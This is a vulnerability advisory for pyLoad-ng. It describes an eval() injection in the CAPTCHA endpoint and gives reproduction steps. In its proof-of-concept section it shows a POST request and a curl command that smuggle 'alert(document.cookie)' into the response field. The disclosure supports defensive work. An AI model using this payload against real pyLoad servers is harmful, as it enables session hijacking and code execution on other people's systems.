PT-2026-53570 · Pypi · Pyload-Ng
Publicado
2026-06-29
·
Atualizado
2026-06-29
CVSS v3.1
9.8
Crítica
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Summary
An unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows unauthenticated remote attackers to execute arbitrary code in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system rce.
Details
The vulnerable code resides in
javascript
function onCaptchaResult(result) {
eval(result); // Direct execution of attacker-controlled input
}- The
onCaptchaResult()function directly passes CAPTCHA results (sent from the user) intoeval() - No sanitization or validation is performed on this input
- A malicious CAPTCHA result can include JavaScript such as
fetch()orchild process.exec()in environments using NodeJS - Attackers can fully hijack sessions and pivot to remote code execution on the server if the environment allows it
Reproduction Methods
- Official Source Installation:
bash
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload- Virtual Environment:
bash
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyloadCAPTCHA Endpoint Verification
Technical Clarification:
- The vulnerable endpoint is actually:
/interactive/captcha- Complete PoC Request:
http
POST /interactive/captcha HTTP/1.1
Host: localhost:8000
Content-Type: application/x-www-form-urlencoded
cid=123&response=1%3Balert(document.cookie)- Curl Command Correction:
bash
curl -X POST "http://localhost:8000/interactive/captcha"
-d "cid=123&response=1%3Balert(document.cookie)"- Vulnerable Code Location: The eval() vulnerability is confirmed in:
src/pyload/webui/app/static/js/captcha-interactive.user.jsResources
- https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546
- [OWASP: Avoid
eval()](https://cheatsheetseries.owasp.org/cheatsheets/JavaScript Security Cheat Sheet.html#eval) - #4586
Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Pyload-Ng